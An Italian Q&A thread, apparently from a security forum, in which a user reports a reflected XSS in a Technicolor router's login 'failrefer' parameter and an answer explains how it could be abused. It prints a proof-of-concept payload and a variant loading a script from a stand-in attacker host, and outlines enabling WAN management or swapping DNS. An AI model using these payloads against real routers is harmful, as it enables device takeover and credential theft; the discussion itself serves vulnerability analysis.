Una possibile vulnerabilità del router XSS

2

Ho cercato di analizzare il mio modem router e vedere come funziona e verificare eventuali vulnerabilità nel sistema. e vorrei un aiuto.

Ricerca sulla sicurezza del router:

router access ip : 192.168.1.1

prima controlla il server web:

if (user_level == -1) {
    location.href = "admin.html";
//if user_level == -1 // get him back to the login page 

il server web ottiene il "user_level" da un file javascript.

location : http://192.168.1.1/users.sjs
var currentUser = "error"; var user_level = -1; 

Non so come il web server possa inviare valori a questo script! questo script ha variabili globali?

se il login è riuscito: i valori del file javascript:

location : http://192.168.1.1/users.sjs
var currentUser = "technicolor"; var user_level = 15; 

/// current user check :
if (currentUser == "technicolor") {
        location.href = "thomson/index.html";
    }

quindi il server web dà accesso se user.sjs ha technicolor e 15 come valori delle variabili!

la pagina di accesso invia una richiesta POST a questo file:

POST /cgi-bin/basicauth.cgi?index.html HTTP/1.1

una delle variabili richieste è failrefer se l'accesso non è riuscito lo reindirizzerà a /admin.html e ho trovato che questa variabile del post ha un XSS vulnerability :

&failrefer=/admin.html</script><script>confirm(1)</script>

voglio davvero sapere cosa ne pensi! c'è un modo in cui qualcuno può accedere al mio pannello di controllo del router se trova questa vulnerabilità! grazie:)

    
posta Yorke York 31.08.2015 - 04:42
fonte

1 risposta

2

Sì, potrebbero controllare il router con tale vulnerabilità.

Anche se esiste un limite alla lunghezza del parametro failrefer , un utente malintenzionato potrebbe ospitare uno script in grado di eseguire funzioni router su http://evil.example.com/attack_router.js e quindi ingannare l'utente in visita

&failrefer=/admin.html</script><script src="http://evil.example.com/attack_router.js"></script>

in qualche modo. Ad esempio, inviandoti link di phishing o inviando email che sembrano provenire dai tuoi contatti conosciuti (se si trattava di un attacco mirato).

Tuttavia, dovresti essere già connesso al router (e suppongo che una chiamata all'URL sopra non ti disconnetta) o che il tuo router sia configurato con credenziali predefinite o deboli.

Tutto lo script attack_router.js dovrebbe essere necessario effettuare richieste POST alle pagine di configurazione del router. Ad esempio, alla pagina di accesso remoto per abilitare la gestione HTTP sul lato WAN. L'autore dell'attacco, conoscendo il tuo IP dalla richiesta al loro dominio evil.example.com , può semplicemente accedere al tuo router.

Altri attacchi di esempio utilizzerebbero la pagina di configurazione DNS per cambiare il tuo DNS con uno che è sotto il controllo dell'attaccante. Quindi potrebbero reindirizzarti ai loro sistemi per tentare di acquisire le tue credenziali (ad esempio un attacco stile sslstrip).

    
risposta data 31.08.2015 - 13:50
fonte

Leggi altre domande sui tag